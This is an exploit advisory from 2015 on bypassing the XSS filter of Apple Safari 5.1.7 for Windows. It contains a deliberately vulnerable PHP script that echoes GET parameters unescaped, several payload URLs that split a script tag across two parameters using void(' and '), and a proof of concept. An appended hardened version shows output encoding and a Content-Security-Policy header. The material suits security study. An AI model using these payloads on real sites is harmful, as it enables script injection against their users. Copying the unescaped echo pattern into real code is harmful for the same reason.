Apple Safari 5.1.7 (Last Version For Win) XSS Filter Bypass

2015.08.28
Credit: Mahdi.Hidden
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

**************************************************************************
# Exploit Title: Apple Safari 5.1.7 (Last Version For Win) XSS Filter Bypass
# Exploit Author: Mahdi.Hidden
# Date: 2015-08-28
# Vendor Homepage: http://apple.com/
# Software Link: https://apple.com/safari/
# Version: 5.1.7
# Tested on: Windows
**************************************************************************

Description

XSS attacks occur when a PHP script does not filter its inputs and echoes them directly into the web page. This vulnerability is very common in websites and web applications, and a lot of websites have it. XSS usually relies on injected JavaScript, and that is why browsers ship an XSS filter. The browser's XSS filter looks for JavaScript in the URL and in HTTP POST requests; if JavaScript is detected, the XSS filter does not let it execute. However, the XSS filter can be bypassed in some ways. I will show you what I found.

Full Explanation

As you know, for security reasons Safari does not execute JavaScript reflected through a cross-site scripting vulnerability, and this stops many XSS attacks. Now, suppose you have a vulnerable PHP script like this (e.g. safari.php):

    <?php
    // Echo the value of parameter one
    echo "This is text1:".$_GET['text1']."<br><br>";
    // Echo the value of parameter two
    echo "This is text2:".$_GET['text2']."<br><br>";
    ?>

(This PHP script takes two parameters and prints them without any filtering. That allows you to make an XSS attack.)

If you test a cross-site scripting payload like this in Safari:

    http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/)</script>&text2=Something

the JavaScript will be shown in the page source, but you will get no alert. That is because of Safari's protection; if you try other payloads you will see the same result. Now, let's try closing the script tag in $_GET['text2']:

    http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/)&text2=</script>

In this case your code is shown completely, without being detected as an XSS attack or anything like that, but it is treated as HTML text: the page's own output between the two parameters (<br><br>This is text2:) now sits inside the script element, where it is not valid JavaScript.

OK, now I want to use quoting and put the non-code text inside a pair of quotation marks, so that the HTML text is treated as a simple string. For example, using void(''), put void(' in parameter one and close it with ') in parameter two. Now let's try it:

    http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/);void('&text2=')</script>

You will see the alert! Your JavaScript code is executed. Instead of void(''), you can use document.write('') or similar. For example:

    http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>

POC

    http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/);void('&text2=')</script>

Payload

    ?text1=<script>alert(/XSS/);void('&text2=')</script>

Thanks.

**************************************************************************
# Exploited by Mahdi.Hidden
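A hardened counterpart to the advisory's safari.php, added here as an example and not part of the original advisory: it HTML-encodes both parameters on output, which is the fix that does not depend on the browser's XSS filter, and adds a Content-Security-Policy header as defence in depth. The helper names `h()` and `param()` are assumptions of this example.

```php
<?php
// Hardened version of the page's safari.php (added example, not the
// advisory's code). Output encoding is the real fix: the browser-side XSS
// filter is only a secondary defence, and this advisory shows it bypassed.

// Encode a value for insertion into HTML text content. ENT_QUOTES also
// escapes the single quote, so the void('...') trick cannot close a string;
// ENT_SUBSTITUTE avoids returning "" when the input is invalid UTF-8.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read a GET parameter as a string; an array value (?text1[]=x) becomes "".
function param(string $name): string
{
    $v = $_GET[$name] ?? '';
    return is_string($v) ? $v : '';
}

// Defence in depth: a CSP without 'unsafe-inline' stops any reflected
// <script> block even if an encoding call is forgotten elsewhere.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('Content-Type: text/html; charset=UTF-8');

echo "This is text1:" . h(param('text1')) . "<br><br>";
echo "This is text2:" . h(param('text2')) . "<br><br>";

// With the advisory's payload (?text1=<script>alert(/XSS/);void('&text2=')</script>)
// the response now contains only inert text, e.g. for text1:
//   This is text1:&lt;script&gt;alert(/XSS/);void(&#039;<br><br>
```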

